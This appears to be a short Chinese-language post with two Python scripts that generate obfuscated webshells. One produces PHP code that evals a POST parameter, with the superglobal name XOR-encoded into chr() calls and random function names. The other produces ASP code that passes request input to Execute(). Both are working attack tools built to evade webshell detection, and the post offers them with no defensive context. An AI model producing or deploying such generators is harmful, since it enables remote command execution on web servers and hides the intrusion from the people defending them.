php

import random

shell='''<?php
function {1}(){{
	$_1={0};
	return $_1;
}}

function {2}($user)
{{
	$_x=null;
	eval("\\n".$user.$_x);
}}
$_2=${{{1}()}}[a];
$_3=null;
$_4=$_3.$_2;
{2}($_4);
?>'''



list=[80,79,83,84]

def random_name(len):
    str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
    return ''.join(random.sample(str,len))   
    
def get_num():
    post_str = "'_'"
    for i in list:
        a=random.randint(1,100)
        b=a^i
        post_str=post_str+".chr({0}^{1})".format(a,b)
        #print(".chr({0}^{1})".format(a,b))
    #print(post_str)
    return post_str

def main():
    post_str = get_num()
    FunctionName1 = random_name(4)
    FunctionName2 = random_name(4)
    parameter1 = random_name(4)
    parameter2 = random_name(4)
    shellc = shell.format(post_str,FunctionName1,FunctionName2)
    print(shellc)
   
   
main()

效果：

asp

import random

shell='''<%
Function {0}():
    {0} = request("{1}")
End Function

Function {2}(st):
    execUte(st)
End Function

{3} = Mid({0}(),1)
{4} = {3}&""
{2}({4})
%>'''


def random_name(len):
    str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    return ''.join(random.sample(str,len))   
    
def build_webshell():
    FunctionName = random_name(4)
    parameter = random_name(4)
    FunctionName1 = random_name(4)
    TempName1 = random_name(2)
    TempName2 = random_name(3)
    shellc = shell.format(FunctionName,parameter,FunctionName1,TempName1,TempName2)
    return shellc


if __name__ == '__main__':
    print (build_webshell())

效果: